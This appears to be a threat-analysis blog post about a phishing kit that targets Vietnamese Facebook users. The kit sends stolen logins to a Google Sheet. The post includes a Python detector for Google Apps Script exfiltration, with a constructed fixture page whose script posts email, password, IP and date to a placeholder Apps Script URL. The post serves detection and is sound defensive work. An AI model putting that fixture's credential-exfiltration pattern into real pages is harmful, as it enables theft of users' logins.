As we operate a StalkPhish instance that scans thousands of suspicious links a day, we often find what we might call original phishing kits to analyse. Today we found a phishing kit targeting Vietnamese Facebook users:
There is no e-mail exfiltration vector, as we commonly see: this kit uses a Google Sheets form and an AJAX POST to exfiltrate the stolen credentials!
Reading the HTML source code, we can see the page grab the victim's IP address, domain and date:
As well as the credentials entered by the user:
This function relies on Google Apps Script, which permits writing into a Google Sheet through its API!
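For analysts triaging similar kits, here is a small static check we can run over a landing page's source. It is an added example written for this post, not code from the kit or from StalkPhish: it looks for the combination described above, a client-side POST to a Google Apps Script web-app URL (the `script.google.com/macros/s/.../exec` shape such deployments use) that carries credential fields together with victim context (IP, domain, date). The two sample pages and the deployment id in the URL are constructed for the demonstration; a benign page that merely links a published Google Sheet is included to show it is not flagged.

```python
"""Static triage of an HTML page for Google Apps Script credential exfiltration.

Added example for this write-up (not code from the kit or from StalkPhish).
The sample pages below are constructed test fixtures, not a real kit's source.
"""
import re
import sys
from dataclasses import dataclass, field

# Google Apps Script web apps are published under this URL shape; the
# deployment id is an opaque token, matched generically here.
GAS_ENDPOINT_RE = re.compile(
    r"https?://script\.google\.com/macros/s/[A-Za-z0-9_-]+/exec", re.I
)
# Common ways client-side code issues the POST (jQuery, fetch, raw XHR).
POST_CALL_RE = re.compile(
    r"(\$\.ajax|\$\.post|fetch\(|XMLHttpRequest|\.open\(\s*['\"]POST"
    r"|(?:type|method)\s*:\s*['\"]POST)",
    re.I,
)
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
INPUT_NAME_RE = re.compile(r"<input[^>]*\bname\s*=\s*['\"]([^'\"]+)['\"]", re.I)
CREDENTIAL_NAMES = ("email", "user", "login", "pass", "pwd")
CONTEXT_NAMES = ("ip", "domain", "date", "time", "country")


@dataclass
class Finding:
    endpoints: list = field(default_factory=list)       # Apps Script URLs seen
    posts_to_endpoint: bool = False                     # POST code in same script
    credential_fields: list = field(default_factory=list)
    context_fields: list = field(default_factory=list)  # victim context collected

    @property
    def verdict(self) -> str:
        if self.endpoints and self.posts_to_endpoint and self.credential_fields:
            return "gsheet-exfil"
        if self.endpoints:
            return "gas-endpoint-only"
        return "clean"


def triage(html: str) -> Finding:
    """Return what the page exposes about a Google Sheets exfiltration channel."""
    f = Finding()
    f.endpoints = sorted(set(GAS_ENDPOINT_RE.findall(html)))
    scripts = SCRIPT_RE.findall(html)
    # Only count a POST when it sits in the same <script> as the endpoint URL,
    # so an unrelated fetch elsewhere on the page does not raise the verdict.
    f.posts_to_endpoint = any(
        GAS_ENDPOINT_RE.search(s) and POST_CALL_RE.search(s) for s in scripts
    )
    names = [n.lower() for n in INPUT_NAME_RE.findall(html)]
    f.credential_fields = [n for n in names if any(k in n for k in CREDENTIAL_NAMES)]
    joined = "\n".join(scripts)
    f.context_fields = [
        k for k in CONTEXT_NAMES if re.search(rf"\b{k}\b", joined, re.I)
    ]
    return f


# Constructed fixture mimicking the pattern described in the post.
SAMPLE_KIT_PAGE = """
<html><body>
<form id="login">
  <input type="text" name="email" placeholder="Email or phone">
  <input type="password" name="pass" placeholder="Password">
  <button type="submit">Log in</button>
</form>
<script>
  var ip = "203.0.113.7", domain = window.location.hostname,
      date = new Date().toISOString();
  $("#login").submit(function (e) {
    e.preventDefault();
    $.ajax({ url: "https://script.google.com/macros/s/CONSTRUCTED_DEPLOYMENT_ID/exec",
             type: "POST",
             data: { email: $("[name=email]").val(), pass: $("[name=pass]").val(),
                     ip: ip, domain: domain, date: date } });
  });
</script></body></html>
"""

# Constructed benign fixture: a normal login form plus a published-sheet link.
SAMPLE_BENIGN_PAGE = """
<html><body>
<form action="/login" method="post">
  <input type="text" name="email"><input type="password" name="password">
</form>
<script>fetch("https://docs.google.com/spreadsheets/d/CONSTRUCTED/pubhtml");</script>
</body></html>
"""

if __name__ == "__main__":
    # Usage: python triage.py index.html [...]; with no paths, run the fixtures.
    pages = [(p, open(p, encoding="utf-8", errors="replace").read()) for p in sys.argv[1:]]
    pages = pages or [("sample_kit", SAMPLE_KIT_PAGE), ("sample_benign", SAMPLE_BENIGN_PAGE)]
    for name, html in pages:
        r = triage(html)
        print(f"{name}: {r.verdict} endpoints={r.endpoints} "
              f"creds={r.credential_fields} context={r.context_fields}")
```

The verdict deliberately needs all three signals together (an Apps Script endpoint, POST code next to it, and credential inputs), so ordinary pages that embed a Google Sheet or call a legitimate Apps Script web app end up as `gas-endpoint-only` rather than being flagged as exfiltration.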
index.html (SHA256): 3cfd92bdd9a801382199a52624ecaa8b78a32dc80893f0a6186cce4128c6552b
phishing kit archive (SHA256): 34ee59548f8ba626568d91393acb76791a559f958c1f61bf5dabeb425e396640
Phishing Kit YARA rule: https://github.com/t4d/PhishingKit-Yara-Rules/blob/master/PK_Facebook_GSheet.yar